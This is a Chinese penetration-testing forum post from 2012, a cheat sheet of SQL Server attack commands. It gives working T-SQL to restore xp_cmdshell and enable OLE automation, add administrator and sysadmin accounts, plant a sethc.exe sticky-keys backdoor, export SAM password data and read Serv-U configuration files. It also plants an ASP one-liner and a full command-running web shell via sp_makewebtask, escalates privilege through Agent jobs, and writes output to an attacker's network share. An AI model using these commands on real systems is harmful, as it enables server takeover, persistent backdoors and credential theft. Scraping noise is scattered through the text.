找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 XP_CMDSHELL恢复方法大全
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2088|回复: 0
打印 上一主题 下一主题

XP_CMDSHELL恢复方法大全

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-15 14:37:30 | 显示全部楼层 回帖奖励 |倒序浏览 |阅读模式
1 未能找到存储过程'master..xpcmdshell'.  EXEC master.dbo.sp_addextendedproc 后用下面的三种方法,在注入点上执行加个空格和;号
; z2 X) v$ P. b5 v  V# p1 }# L恢复方法:查询分离器连接后,
. b+ _! s5 i" m- W第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
; o- X* a; o6 P2 f4 _4 F第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll' ) g* s  }- R% o  E' A" m, Q
然后按F5键命令执行完毕  H, T8 ]1 k( l. b% N3 t: @
" t! `  n, J$ F
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)" K# ]2 ?) v3 U- K/ K- V
恢复方法:查询分离器连接后,
* c/ A  Z" p2 m. b" t6 J第一步执行:EXEC master.dbo.sp_dropextendedproc "xp_cmdshell"
8 n% }  \' C" {第二步执行:EXEC master.dbo.sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
2 ?5 i( u, J2 ]$ [" f; O然后按F5键命令执行完毕8 U( m! y' _: ]% d' C2 |, S4 e: l: A

+ R, o3 N$ ]& n" k# f4 I3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
: V% X" ]# ]/ L9 Q! ~4 H恢复方法:查询分离器连接后,; H# \- R8 F* i+ o+ r3 ?7 k
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'8 i2 _: l1 ^( ?' t1 [( T- t
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'       3 N' F' K& z8 K: L! w  _" V& Z
然后按F5键命令执行完毕
2 @7 {1 ^7 T" r! p' g: o: e! s# n
( {9 a4 N, H" L9 y4 终极方法., ^2 M+ ^' Y# Y% U" N7 |3 e: e# ~
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
% w  {$ h* M% Q3 t( n. ~+ F7 k1 g查询分离器连接后,0 E9 k* [8 v6 c
2000servser系统:
- _' m+ \# f" B- zdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 新用户 密码 /add'# m' p: c* t+ V

+ o8 r6 L0 a2 }6 _3 @, ideclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 新用户 /add'7 b2 G) [- H& C. K# {' l

4 k. `4 L! s7 H0 A) {8 A& mxp或2003server系统:
, N9 o4 V8 i' c5 U7 i) x. h+ u  o& Z
! ^) |' o$ A; U' edeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 新用户 密码 /add'
1 Z; ~, E6 N$ n: u9 @5 m4 D% y2 r  c; b) K
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add'
& i/ {- L" g, ]4 g) Y1 ~. D
6 J7 R- \0 O0 E7 h8 a3 T% t+ a4 k+ k  x
五个SHIFT: t7 v+ l' ~* I# U; s
declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';& P4 }9 e0 q3 Z/ X& w6 H

: T/ `# p( A. k2 adeclare @oo int exec sp_oacreate 'scripting.filesystemobject', @oo out exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe'; 5 i9 ~) [6 G$ P% H& H

8 G- x: J7 N6 x/ gxp_cmdshell执行命令另一种方法
% ]; G; N/ M0 Z  l+ q; sdeclare @a sysname set @a='xp_'+'cmdshell' exec @a 'net user refdom 123456 /add' % N. |) D5 L# e( t" K
: H+ O; F! |! v3 P
判断存储扩展是否存在
5 F3 f8 |& A) C/ fSelect count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'0 d) F/ q% F1 |
返回结果为1就OK; V# e* D2 z; ?" P: q1 G
8 C# E' ~* |" Q

8 O) D6 _0 u% v: U/ q6 |. e上传xplog70.dll恢复xp_cmdshell语句:3 j8 [5 q8 h+ c; O9 m
sp_addextendedproc xp_cmdshell,@dllname='E:\newche2\about\XPLOG70.DLL'( c1 y/ i& ]8 {) {: A
( c& n! Q* F! B/ x8 h# \* |
否则上传xplog7.0.dll* }- x( i' H, o; R: c4 K
Exec master.dbo.addextendedproc 'xp_cmdshell','C:\WinNt\System32\xplog70.dll'
' b" F6 L# a# X$ K  }: o! y' e( |0 \7 j" D: {8 P$ Q

# Q- i$ s: k* }" B+ ?7 N+ P0 ~
0 D: r5 Q' D0 P首先开启沙盘模式:  {0 P+ j8 ?$ ]7 Q
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
8 ^7 k' j5 O) r) K% G& ~7 e  a/ ]
7 q) r. b% L  S然后利用jet.oledb执行系统命令
* l( E# _& |+ N0 ~select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')( M# W  e' k  ^* t9 o$ Y$ G8 D+ s
返回 不能找到c:\windows\system32\ias\ias.mdb错误,用exec master..xp_dirtree 'c:\windows\system32\ias\ias',1,1--  发现c:\windows\system32\ias\ias.mdb没了,应该是被管理员删掉了,还有另一个mdb也没了. `+ f) W- F; t' J, @* V# f

- a& U( \. z. ]! j5 b+ @$ P8 Z1 I
- X, n: `6 W: n3 ?
1 R2 U/ T, X0 E, o( Q  N恢复过程sp_addextendedproc 如下:
4 c7 a' e5 ?" ~6 Vcreate procedure sp_addextendedproc --- 1996/08/30 20:13 " h7 h+ X2 V- W" F
@functname nvarchar(517),/* (owner.)name of function to call */ + v4 M0 q+ E' Z# {  S, Z
@dllname varchar(255)/* name of DLL containing function */
& Q, \6 s1 V5 _" N% jas
* I( m' h3 j: T4 Z, I" t; p+ Zset implicit_transactions off
% h( q  ]; n  @5 c! [5 Sif @@trancount > 0
$ s, j/ Q/ R' V# ?+ `begin
% x, K3 F/ i, x7 zraiserror(15002,-1,-1,'sp_addextendedproc') 4 t5 p; x$ _: o" L5 L& B2 F# X( U5 |1 {
return (1)
. n; s' U8 ~! }& u# Oend 3 q' Q" ?( O8 N; e/ v
dbcc addextendedproc( @functname, @dllname) 5 H* g& V, e* y) L6 Q% i# C
return (0) -- sp_addextendedproc
9 I/ [* G. K2 Z& c3 ]GO
7 [3 g1 v. h' u; }! b( k
# m  m2 ?& y5 H2 i% ]) V4 e2 i7 O( Y9 g4 m5 c2 b

0 _# k' X$ D0 o: L& N  x- S: }导出管理员密码文件
( {$ L7 |5 k) t  p% u2 l% o1 qsa默认可以读sam键.应该。9 D, Z6 {) j0 u' o5 H
reg export HKLM\SAM\SAM\Domains\Account\Users\000001F4 c:\old.reg7 L! I9 Z2 ~( q+ |  {
net user administrator test
- L' `" n% [, q% ]4 V4 q4 ~# k用administrator登陆., q. |7 p9 c7 Q( a
用完机器后" A/ x! w4 `  n6 m& R6 E+ E
reg import c:\test.reg
( I' L5 R5 i; {# z4 K+ x2 D; D根本不用克隆.
5 N; F! b' P: d; x% [找到对应的sid.
: c2 ^( r8 |, y$ z8 o% a+ P; s$ |0 M% [; e! E6 z! q
# a8 V8 Q1 u2 H, i2 B1 Z/ Z
* e" j0 F, i) y' V
恢复所有存储过程1 U7 E+ B' K5 T7 B5 Q
use master 5 b4 P1 d3 l" i. Q3 {
exec sp_addextendedproc xp_enumgroups,'xplog70.dll' - D) Q1 F# n- D6 g
exec sp_addextendedproc xp_fixeddrives,'xpstar.dll' 0 g& M: L) x, z+ c( _: H% q8 p" h
exec sp_addextendedproc xp_loginconfig,'xplog70.dll'
4 P/ L' F. A' c! mexec sp_addextendedproc xp_enumerrorlogs,'xpstar.dll' 4 c4 v( W0 W* S+ J8 I
exec sp_addextendedproc xp_getfiledetails,'xpstar.dll'
$ c2 q# n& F! Dexec sp_addextendedproc sp_OACreate,'odsole70.dll'   s' t5 I! X7 l& }7 V6 S1 e
exec sp_addextendedproc sp_OADestroy,'odsole70.dll'
. b2 A6 ?' b+ Hexec sp_addextendedproc sp_OAGetErrorInfo,'odsole70.dll' " ?( s, {8 F9 N0 e
exec sp_addextendedproc sp_OAGetProperty,'odsole70.dll'
& l5 e6 X, K, r8 C9 V1 D7 A( e# @exec sp_addextendedproc sp_OAMethod,'odsole70.dll'
" n' O3 i! J1 a0 b: y, g  l" aexec sp_addextendedproc sp_OASetProperty,'odsole70.dll' ( o4 }5 x' m: M# j5 w
exec sp_addextendedproc sp_OAStop,'odsole70.dll'
5 i& {# R! @( i  I- T: J# B8 pexec sp_addextendedproc xp_regaddmultistring,'xpstar.dll' . C8 I5 [/ K2 V& P- H( c3 p3 \
exec sp_addextendedproc xp_regdeletekey,'xpstar.dll'
% \* U1 S: n2 w6 Z4 e' o9 Gexec sp_addextendedproc xp_regdeletevalue,'xpstar.dll'
9 z7 A1 D- M5 c$ |1 \" t5 D, s. Aexec sp_addextendedproc xp_regenumvalues,'xpstar.dll' 1 s1 ~( _2 \6 H4 ?
exec sp_addextendedproc xp_regread,'xpstar.dll'
: F9 K* U$ e1 R5 I3 ~exec sp_addextendedproc xp_regremovemultistring,'xpstar.dll' 8 p9 G) F; U! \+ E( _* q* f5 h8 ]( C
exec sp_addextendedproc xp_regwrite,'xpstar.dll'
# e/ U- U% _- W  J/ v0 }exec sp_addextendedproc xp_availablemedia,'xpstar.dll'
. p. r: j& K1 o, C2 G/ O4 V
& o' w: @* _4 n
. w6 K' Q: h' @- o1 j建立读文件的存储过程
. D: K( w7 ^, k8 N  U8 D0 w- y- nCreate proc sp_readTextFile @filename sysname1 U. p/ w6 D: g2 }
as
& {. U0 M, a5 k4 e5 m2 X& f$ o
# W8 W7 X: f! J# t3 }    begin , H. l, z6 P/ n& e. E6 g# ^
    set nocount on 5 s& h& @$ _; G& y5 j: Z4 L" s
    Create table #tempfile (line varchar(8000))* T& f# ]) l: z! x
    exec ('bulk insert #tempfile from "' + @filename + '"')
( P# V. U1 I+ E    select * from #tempfile
) s5 n! [0 j) i# E  I5 B- d3 k+ G    drop table #tempfile4 [4 Y$ J7 V9 F
End
+ M/ u+ X0 L5 T* j
4 A  {, A- V8 i8 Q  Hexec sp_readTextFile 'D:\testjun17\Teleweb-Japan\default.asp' 利用建立的存储过程读文件0 [/ A6 m9 k" N& p
查看登录用户  V- ~" ^, w1 R8 v
Select * from sysxlogins1 O# I. ^- t$ j6 P, J

: c, @6 v( k  j' y把文件内容读取到表中  m* c, s  i# ^2 P
BULK INSERT tmp from "c:\test.txt"/ h5 Z. r+ A8 p6 S
dElete from 表名 清理表里的内容' @8 S. C. p5 [' j
create table b_test(fn nvarchar(4000));建一个表,字段为fn
7 g1 |: [) `6 U! H2 ?+ s; W) d( b- B  l2 `. ]# |+ Y+ t

/ R% Y4 k7 e' J% t加sa用户
2 z3 o& O+ k# y; J! Kexec master.dbo.sp_addlogin user,pass;2 J! h2 g6 Y8 H! R8 a4 [9 r: b/ O
exec master.dbo.sp_addsrvrolemember user,sysadmin
$ S( m$ c6 v. U5 @
+ A0 Z5 X% g: [9 h9 J1 Z4 f/ M2 F( n! i6 _0 ?; o
( f/ C& }6 D8 M4 l
读文件代码
6 {/ r: q; I5 |declare @o int, @f int, @t int, @ret int% y# v8 F" h+ z, W  W, g5 G
declare @line varchar(8000)" ^" ?5 x! b: v# A/ E7 {% \* N
exec sp_oacreate 'scripting.filesystemobject', @o out  ^# j0 o' O6 z0 L' o
exec sp_oamethod @o, 'opentextfile', @f out, '文件名', 1/ H. p6 w. T0 k: \8 p* c6 N0 ?
exec @ret = sp_oamethod @f, 'readline', @line out& L+ j! b" R* M/ c  P
while( @ret = 0 )
1 Y) x% N2 m# W8 B% Ebegin2 r% O) V  d$ M$ T3 Q# g' }
print @line! T& |' O& n- q; e0 W3 m
exec @ret = sp_oamethod @f, 'readline', @line out
& ~. m' m( ?" j( {/ c: |end. N7 e  `9 ?0 V# u4 |  y" F

2 i& l+ N) ?9 w1 L) U
% N  Q+ w+ y4 [1 }# P写文件代码:7 O) q' N$ {3 \! h
declare @o int, @f int, @t int, @ret int
1 P/ ^7 }  K7 J. Texec sp_oacreate 'scripting.filesystemobject', @o out
$ K+ f# w; F0 |7 d" D! ^$ Hexec sp_oamethod @o, 'createtextfile', @f out, 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini', 1
/ L, l1 J7 t7 ^  \2 }exec @ret = sp_oamethod @f, 'writeline', NULL, 《内容》' Y5 N5 n3 f( r
# K( A5 D3 k/ |  q0 C6 p; h( f

: S& X! j$ Q* z9 l9 @0 ?" n添加lake2 shell
( F( u3 y# |$ e$ r9 Gsp_addextendedproc 'xp_lake2', 'c:\recycler\xplake2.dll'7 T" ^5 l) ]7 G5 r" `# ]8 w
sp_dropextendedproc xp_lake21 M  O- f( f' f1 L
EXEC xp_lake2 'net user'
3 q; r; V1 S) ^
" @" x1 y+ c7 m8 B! e
( N6 G( {0 j& J0 m' q+ V! j0 R得到硬盘文件信息
* _( |. S' w. E2 `( {1 r5 e+ `--参数说明:目录名,目录深度,是否显示文件
3 R  T+ X0 \! {! M! Q, lexecute master..xp_dirtree 'c:' 1 h% w0 P. f+ \* }6 |6 D: B
execute master..xp_dirtree 'c:',1 - r# s2 Z) T6 C2 Z2 \$ L8 ]* Q0 M
execute master..xp_dirtree 'c:',1,1
/ k9 N3 C. g" V& _2 p! [
; L( a" i  @' y1 j; y0 `6 q3 {4 N; ^/ T  `: R9 z
读serv-u配置信息0 P9 t' W! F+ A0 G9 N5 N9 n
exec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ReadMe.txt'+ ~' o0 V) d  g6 P3 `7 w- N0 |9 V
exec sp_readTextFile 'd:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini'
% Z8 M7 ~7 X' C7 r, t! t* c% G- Y% m1 H" }" ]' h: K
通过xp_regwrite写SHIFT后门' n1 m  P/ g  Y6 Y
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','debugger','REG_sz','c:\windows\system32\cmd.exe on';--# Q- u% Z0 n6 x# ^+ K! x4 W% ?

* N( K4 L- @6 i: G# Z3 o* V1 ^6 L9 ~+ B

; J' p$ Q! N5 @6 o) S- w* S- C0 S找到web路径然后用exec master.dbo.xp_subdirs 'd:\web\www.xx.com';. f9 z' n  f0 f
exec sp_makewebtask 'd:\web\www.XXXX.com\XX.asp','select''<%execute(request("SB"))%>'' '备 份一个小马就可以了4 Z1 F6 U3 {8 j, H% n0 {+ i

" c% W2 A+ {% u+ y/ JEXECUTE sp_makewebtask @outputfile = ‘WEB绝对路径\导出的文件名.asp',@query = 'SELECT 你的字段 FROM 你建的临时表'9 `6 m' n$ \! S: t* Q
+ @" g7 J6 U' E

5 t0 A: K/ a1 {! Z0 A! W/ I% f& q/ ^) ]( O% `* Y: ]
sql server 2005下开启xp_cmdshell的办法
: h; y/ f/ X1 f' v: t. R$ C7 O, a0 e  V: }( U
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
. p+ g5 w0 W1 @, ?, n
% L% \1 m2 e& ]9 d" @3 I! _SQL2005开启'OPENROWSET'支持的方法:
  o7 e" C; ^2 o6 b6 L, ]8 |* x; o2 e  m/ x' r
exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;
! K# [; I& l' U: n
. h0 F7 l* h& b8 s# ^7 A  d0 P) e/ BSQL2005开启'sp_oacreate'支持的方法:7 ]  Y9 u7 h: H' z

: t& ~6 g4 L/ v5 M' nexec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;
  ?+ g( \( K" V" g- Z
5 y6 t/ W# f/ J; ?* B8 U  Z& n4 ]+ y- D  t7 i/ E  O/ F. X; `
: ^) t* h1 d0 S) h( M" ~

% y- K. D! f2 Y, }
  Z. N, v; Y8 y
1 C5 C/ S$ S0 I; U0 ]; N
! m  O7 E: _- S7 W, u$ c) v) c
, t* h6 Y6 m% V. Q% n  P, R" b, @3 C: c/ X, X. S2 O
/ f) {8 l7 W& s$ b3 V
- N, `+ ]2 @4 g
. K$ D! C. W' |4 o8 v7 H

$ Q% v% q3 D2 C2 _, A" |+ G( e0 O- f

8 r5 `* N6 S# d
5 }4 R* {7 S2 \- a+ Q; [4 C% q" @# n5 M" J- }( F
$ B; v* |4 |3 O4 Q- ?% @% h; H
6 x! u- X4 b# T: m: ?1 I

+ r1 c% |) [. [& ]+ a+ R3 f) L  s9 p  y. O8 k! d/ F
% \4 g1 B! b. ~/ ~/ a: R
3 Z; |( [: _2 p
* d  E1 Z8 k) p( o
以下方面不知道能不能成功暂且留下研究哈:. `. q6 H: g6 h
4)7 s; p- V* j3 s# ?
use msdb; --这儿不要是master哟
! }2 }& B: T+ y2 v' Uexec sp_add_job @job_name= czy82 ;
* x) W$ a2 h% Q  I8 _+ Texec sp_add_jobstep @job_name= czy82 ,@step_name = Exec my sql ,@subsystem= CMDEXEC ,@command= dir c:\>c:\b.txt ;/ s) ^3 K7 l$ O  z# \0 R% I' i# [
exec sp_add_jobserver @job_name = czy82 ,@server_name = smscomputer ;" q9 N- U' S! \0 z5 }: n
exec sp_start_job @job_name= czy82 ;
) q: f8 c% `4 Z4 \6 o1 i; P& K$ _0 U; S
5 t! P" y8 O9 {6 s- _& @( ~利用MSSQL的作业处理也是可以执行命令的而且如果上面的subsystem的参数是tsql,后面的我们就可以+ U6 u( H) T0 S' t" m. ]
执行tsql语句了.. m( U/ X3 _$ F$ e% `1 `
对于这几个储存过程的使用第一在@server_name我们要指定你的sql的服务器名" r- Q& x: A: q6 S1 W7 j+ s
第二系统的sqlserveragent服务必须打开(默认没打开的气人了吧)1 X; j3 M; z$ g6 o/ c
net start SQLSERVERAGENT% L$ }7 }; _. A1 j

. m) Q' Z2 a. k2 U4 J+ h! k9 X对于这个东东还有一个地方不同就是public也可以执行..同这儿也是有系统洞洞的看下面的( S' M2 E+ d, @
USE msdb
& \( u+ V5 k1 ?EXEC sp_add_job @job_name = GetSystemOnSQL ,
6 u5 @& [1 z: F! S' r@enabled = 1,8 P& l2 T' g; Y/ x
@description = This will give a low privileged user access to* b$ h1 K! I( ^( j  ~6 j
xp_cmdshell ,; W% ~  o( I" E# K$ r
@delete_level = 1
  T( R+ }6 v: D6 q" L' g2 L+ a  PEXEC sp_add_jobstep @job_name = GetSystemOnSQL ,
* y+ W6 A. ~# l+ p& L8 v; {@step_name = Exec my sql ,
% W. r1 T3 l0 O( o8 m* ^8 z* |- A- E- p@subsystem = TSQL ,
& O2 u3 k7 q0 V' M" x0 x@command = exec master..xp_execresultset N select exec
9 y( I1 n& K0 S6 umaster..xp_cmdshell "dir > c:\agent-job-results.txt" ,N Master 2 M7 @. L4 a5 N4 J3 V
EXEC sp_add_jobserver @job_name = GetSystemOnSQL ,
7 T* }1 O" {/ \4 Z@server_name = 你的SQL的服务器名 - W1 ~2 F+ ^' l/ C) P2 [
EXEC sp_start_job @job_name = GetSystemOnSQL ( L. K- j' }: X, B

) B5 @" y& A8 |. S! `3 ]5 [不要怀疑上面的代码,我是测试成功了的!这儿我们要注意xp_execresultset就是因为它所以
' g. W5 B5 u; O  d) n8 {% z& N才让我们可以以public执行xp_cmdshell6 V9 b+ d% {" A+ c( x

9 u2 M7 N: {! X$ o1 U+ g/ {1 j5)关于Microsoft SQL Agent Jobs任意文件可删除覆盖漏洞(public用户也可以)1 D8 ~3 Z; P" ]' c. j  L" b
在安焦有文章:http://www.xfocus.net/vuln/vul_view.php?vul_id=29685 |7 D$ g+ R6 k6 N$ j7 \- l
2 ~; C5 x5 }/ h! T
USE msdb, t3 q' ~# |: |- H6 t
EXEC sp_add_job @job_name = ArbitraryFilecreate ,
* V+ K  j$ P6 W9 O@enabled = 1,
0 y& H: n: {2 F5 |! C; f( M$ S@description = This will create a file called c:\sqlafc123.txt ,- e& a0 |8 ~% u$ y1 A
@delete_level = 14 O+ i) `6 V. T8 G+ ^9 R) R0 i7 Y: a  j
EXEC sp_add_jobstep @job_name = ArbitraryFilecreate ,2 A  O% I* F' p6 ^0 B" x
@step_name = SQLAFC ,
7 r6 v' p& j2 ]0 B: O( X# \1 W@subsystem = TSQL ,) X/ r; Y; c1 V% w. V( u
@command = select hello, this file was created by the SQL Agent. ,5 ^' u: c. F2 j* v
@output_file_name = c:\sqlafc123.txt
4 ?; {5 [+ h& G5 ?EXEC sp_add_jobserver @job_name = ArbitraryFilecreate ,
8 I' Y; ]( g+ z  f' \3 c) f@server_name = SERVER_NAME
7 Y8 j0 L  a+ S: p1 O2 IEXEC sp_start_job @job_name = ArbitraryFilecreate
  B5 T* b3 O# B  x8 ?& ]
; B4 Y3 g, P8 C如果subsystem选的是:tsql,在生成的文件的头部有如下内容
; ?2 `  b4 b1 o! E5 [; C( g9 G
- g; |9 a4 V& P  X8 t??揂rbitraryFilecreate? ? 1 ?,揝QLAFC? ???? 2003-02-07 18:24:19
' f- B; g1 R8 e7 I" M----------------------------------------------
3 k# X  K: @7 |  I- thello, this file was created by the SQL Agent.
$ T% s3 n& `& ?, m7 t4 g3 ?# b2 ^, G/ T6 A
(1 ?????)% P0 {2 ~) x& T5 B2 c

( e" P- B  |. c! _0 m/ h! g所以我建议要生成文件最好subsystem选cmdexec,如果利用得好我们可以写一个有添加管理员8 M" s) _! C3 D& h0 F) [* e
命令的vbs文件到启动目录!
+ h/ R* t0 g- k. Z9 w
; G, p+ |# a( ^* J! `5 h7 P6)关于sp_makewebtask(可以写任意内容任意文件名的文件)
: c5 L: w% ^; R. T关于sp_MScopyscriptfile 看下面的例子
7 t0 p+ e/ \- f/ }1 D6 ^/ Rdeclare @command varchar(100) , f$ f6 n2 T  Y% ~9 _' {2 t
declare @scripfile varchar(200) & g) L# |" j! H2 X* F3 Q
set concat_null_yields_null off
$ k* A: J1 w1 Y9 b, L4 y2 H) z4 |select @command= dir c:\ > "\\attackerip\share\dir.txt" # r% W3 n1 L& }0 i  s/ H
select @scripfile= c:\autoexec.bat > nul" | @command | rd "
# L- w* D5 p6 o8 L* s9 Bexec sp_MScopyscriptfile @scripfile ,
# v% s3 i5 F4 U7 C8 {8 l3 B7 h2 m0 P! o) _$ Z6 A) S
这两个东东都还在测试试哟
! M. S3 `$ l" `- N让MSSQL的public用户得到一个本机的web shell5 t( l0 d* [# Z7 B2 Y  E, C# X

' m. \7 u" v' ~+ p, b( hsp_makewebtask @outputfile= d:\sms\a.asp ,@charset=gb2312,; m) t' T; G$ b9 ^' t- r) t
--@query= select <img src=vbscript:msgbox(now())>
6 d5 Y* s" a, ]7 Y; u--@query= select <%response.write request.servervariables("APPL_PHYSICAL_PATH")%> 5 J% x, G; {% r( N$ Q
@query= select 2 m& ^( A3 h! d, p, r
<%On Error Resume Next ' v; ^# ^! _( B3 \5 F
Set oscript = Server.createObject("wscript.SHELL")
, ?# V2 q3 g3 E: Z# WSet oscriptNet = Server.createObject("wscript.NETWORK") ; S4 ]; G; F) X) j: z# M
Set oFileSys = Server.createObject("scripting.FileSystemObject")
2 u' ?( z+ B8 ?, E* r8 KszCMD = Request.Form(".CMD") ' Y% [+ w" y. G- N' \+ B# E5 H
If (szCMD <>"")Then
& {8 A+ ~$ t0 W8 ^3 ?. {& L; ZszTempFile = "C:\" & oFileSys.GetTempName()
  j+ y, l/ D3 @/ l1 I4 m3 t$ ~. I8 QCall oscript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
( F. d# S( Y0 E8 Y8 lSet oFile = oFilesys.OpenTextFile (szTempFile, 1, False, 0) 3 H5 b6 |" v/ w$ b( v5 \
End If %>
  T$ {0 I# |: Z+ Y2 P<HTML><BODY><FORM action="<%= Request.ServerVariables("URL")%>" method="OST"> & o% E9 }1 ?# T
<input type=text name=".CMD" size=45 value="<%= szCMD %>"><input type=submit value="Run">   g' u" A" Q, K- q! K% Y9 A8 a
</FORM><RE>
0 F/ I( P% V+ [, Q7 H<% If (IsObject(oFile))Then , S0 b$ ^9 `! b/ ?! |' z
On Error Resume Next % _2 B! S% ]# M+ i7 A  m
Response.Write Server.HTMLEncode(oFile.ReadAll) " x, j2 ~* U% H9 s/ N5 r
oFile.Close 5 ^$ V, ?& C8 |  A" E" X
Call oFileSys.deleteFile(szTempFile, True)
2 U; u8 Z1 w$ Z0 ]: \End If%> ' D1 Q2 b$ U7 n- e: S3 J
</BODY></HTML>
7 U+ n  ~% K2 b; W$ E. X0 G, d
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表